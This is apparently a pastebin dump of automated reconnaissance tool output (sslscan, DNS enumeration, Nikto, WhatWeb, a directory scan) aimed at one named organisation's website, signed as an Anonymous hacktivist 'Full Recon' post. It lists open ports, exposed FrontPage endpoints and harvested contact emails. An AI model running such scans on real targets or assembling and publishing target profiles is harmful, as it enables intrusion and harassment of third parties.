- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.securedata.net
- Altnames: DNS:*.securedata.net, DNS:securedata.net
- Issuer: RapidSSL RSA CA 2018
- Not valid before: Jul 24 00:00:00 2018 GMT
- Not valid after: Jul 24 12:00:00 2019 GMT
- #######################################################################################################################################
- I, [2018-08-16T23:33:28.460656 #20336] INFO -- : Initiating port scan
- I, [2018-08-16T23:34:23.376069 #20336] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-16_23-33-28.xml
- I, [2018-08-16T23:34:23.401536 #20336] INFO -- : Discovered open port: 207.150.212.85:80
- I, [2018-08-16T23:34:25.197384 #20336] INFO -- : Discovered open port: 207.150.212.85:443
- W, [2018-08-16T23:34:28.671206 #20336] WARN -- : Yasuo did not find any potential hosts to
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: mississippiwhiteknights.com
- [-] DNSSEC is not configured for mississippiwhiteknights.com
- [*] SOA adns.cs.siteprotect.com 64.41.112.12
- [*] NS adns.cs.siteprotect.com 64.41.112.12
- [*] Bind Version for 64.41.112.12 Served by PowerDNS - https://www.powerdns.com/
- [*] NS bdns.cs.siteprotect.com 64.41.114.12
- [*] Bind Version for 64.41.114.12 Served by PowerDNS - https://www.powerdns.com/
- [*] A mississippiwhiteknights.com 207.150.212.85
- [*] Enumerating SRV Records
- [-] No SRV Records Found for mississippiwhiteknights.com
- [+] 0 Records Found
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 207.150.212.85 200 host ftp.mississippiwhiteknights.com Apache
- 64.26.60.153 host mail.mississippiwhiteknights.com
- 64.26.60.229 host pop.mississippiwhiteknights.com
- 64.26.60.229 host smtp.mississippiwhiteknights.com
- 207.150.212.85 200 host www.mississippiwhiteknights.com Apache
- ####################################################################################################################################### =======================================================================================================================================
- Hosts 5
- DNS Records 5
- Subdomains 5
- Hosts (5)
- =======================================================================================================================================
- 64.26.60.153
- 64.26.60.229
- 64.41.112.12
- 64.41.114.12
- 207.150.212.85
- DNS Records (5)
- =======================================================================================================================================
- mississippiwhiteknights.com A 207.150.212.85
- mail.mississippiwhiteknights.com MX 64.26.60.153
- adns.cs.siteprotect.com NS 64.41.112.12
- bdns.cs.siteprotect.com NS 64.41.114.12
- adns.cs.siteprotect.com SOA 64.41.112.12
- Subdomains (5)
- =======================================================================================================================================
- ftp.mississippiwhiteknights.com 207.150.212.85
- mail.mississippiwhiteknights.com 64.26.60.153
- pop.mississippiwhiteknights.com 64.26.60.229
- smtp.mississippiwhiteknights.com 64.26.60.229
- www.mississippiwhiteknights.com 207.150.212.85
- Loadbalancing
- =======================================================================================================================================
- Checking for DNS-Loadbalancing:
- NOT FOUND
- Checking for HTTP-Loadbalancing [Server]:
- Apache
- NOT FOUND
- Checking for HTTP-Loadbalancing [Date]:
- 04:17:01, 04:17:02, 04:17:04, 04:17:05, 04:17:07, 04:17:08, 04:17:09, 04:17:11, 04:17:12, 04:17:14,
- 04:17:16, 04:17:17, 04:17:18, 04:17:20, 04:17:21, 04:17:23, 04:17:24, 04:17:26, 04:17:27, 04:17:29,
- 04:17:30, 04:17:32, 04:17:33, 04:17:35, 04:17:36, 04:17:38, 04:17:39, 04:17:41, 04:17:42, 04:17:44,
- 04:17:45, 04:17:47, 04:17:48, 04:17:50, 04:17:51, 04:17:53, 04:17:54, 04:17:55, 04:17:57, 04:17:58,
- 04:18:00, 04:18:01, 04:18:03, 04:18:04, 04:18:06, 04:18:07, 04:18:09, 04:18:10, 04:18:12, 04:18:13,
- NOT FOUND
- Checking for HTTP-Loadbalancing [Diff]:
- NOT FOUND
- Web Application Firewall
- =======================================================================================================================================
- No WAF detected by the generic detection
- Traceroute
- =======================================================================================================================================
- ICMP ECHO
- 1 public-gw.vpngate.net (10.211.254.254)
- 2 192.168.1.1 (192.168.1.1)
- 3 fp96f9b601.tkyc403.ap.nuro.jp (150.249.182.1)
- 4 118.238.196.48 (118.238.196.48)
- 5 39.110.253.217 (39.110.253.217)
- 6 202.213.194.33 (202.213.194.33)
- 7 ae-4.a01.tokyjp05.jp.bb.gin.ntt.net (120.88.53.9)
- 8 ae-24.r03.tokyjp05.jp.bb.gin.ntt.net (129.250.6.83)
- 9 * *
- 10 ae-1-12.bar2.Tampa1.Level3.net (4.69.137.117)
- 11 level3.co1.as30217.net (4.71.0.30)
- 12 * *
- 13 * *
- 14 207.150.212.85 (207.150.212.85)
- TCP SYN
- 1 207.150.212.85 (207.150.212.85)
- Zone Transfer
- =======================================================================================================================================
- Resolving SOA Record
- SOA adns.cs.siteprotect.com 64.41.112.12
- Resolving NS Records
- NS bdns.cs.siteprotect.com 64.41.114.12
- NS adns.cs.siteprotect.com 64.41.112.12
- Trying NS server 64.41.114.12
- No answer or RRset not for qname
- Trying NS server 64.41.112.12
- No answer or RRset not for qname
- Whatweb
- =======================================================================================================================================
- ftp.mississippiwhiteknights.com [200 OK] Apache
- HTTPServer[Apache]
- IP[207.150.212.85]
- Title[Temporarily Disabled]
- mail.mississippiwhiteknights.com [ Unassigned]
- pop.mississippiwhiteknights.com [ Unassigned]
- smtp.mississippiwhiteknights.com [ Unassigned]
- www.mississippiwhiteknights.com [200 OK] ActiveX[D27CDB6E-AE6D-11cf-96B8-444553540000]
- Adobe-Flash
- Apache
- HTTPServer[Apache]
- IP[207.150.212.85]
- MetaGenerator[Microsoft FrontPage 5.0]
- Object[download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5
- 0
- 2
- 0][clsid:D27CDB6E-AE6D-11cf-96B8-444553540000]
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 207.150.212.85
- + Target Hostname: mississippiwhiteknights.com
- + Target Port: 80
- + Start Time: 2018-08-16 23:29:32 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache
- + Server leaks inodes via ETags, header found with file /, fields: 0x40c 0x440a6df015d40
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + "robots.txt" contains 1 entry which should be manually viewed.
- + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
- + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
- + OSVDB-28260: /_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611: Gives info about server settings.
- + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
- + OSVDB-3092: /stats/: This might be interesting...
- + OSVDB-3092: /test.htm: This might be interesting...
- + OSVDB-3092: /test.html: This might be interesting...
- + OSVDB-3093: /cgi.cgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /webcgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-914/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-915/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /mpcgi/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /ows-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-sys/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-local/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /htbin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgibin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgis/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /scripts/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-win/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /fcgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-exe/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-home/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-perl/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /scgi-bin/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-bin-sdb/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3093: /cgi-mod/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
- + OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
- + 26228 requests: 0 error(s) and 36 item(s) reported on remote host
- + End Time: 2018-08-17 03:33:56 (GMT-4) (14664 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------#######################################################################################################################################
- =======================================================================================================================================
- | Domain: http://mississippiwhiteknights.com/
- | Server: Apache
- | IP: 207.150.212.85
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/mysite/
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/stats/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/cgi-bin/cgiecho
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/cgi-bin/cgiemail
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/index.html
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/postinfo.html
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/robots.txt
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/test.htm
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/test.html
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe/junk_nonexistant.exe
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_bin/shtml.exe/_vti_rpc
- | [+] CODE: 200 URL: http://mississippiwhiteknights.com/_vti_inf.html
- ======================================================================================================================================
- #######################################################################################################################################
- | External hosts:
- | [+] External Host Found: http://www.skynetweb.com
- | [+] External Host Found: http://www.winsave.com
- | [+] External Host Found: http://www.affinity.com
- | [+] External Host Found: http://www.hostsave.com
- | [+] External Host Found: http://www.valueweb.com
- |
- | FCKeditor File Upload:
- |
- | File Upload Forms:
- |
- | E-mails:
- | [+] E-mail Found: mswhiteknights@gmail.com
- | [+] E-mail Found: mississippiwhiteknights@gmail.com
- |
- | Timthumb:
- |
- | Ignored Files:
- | http://mississippiwhiteknights.com/pow_files/filelist.xml
- =======================================================================================================================================
- #######################################################################################################################################
- Anonymous JTSEC #OpDomesticTerrorism Full Recon #10
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement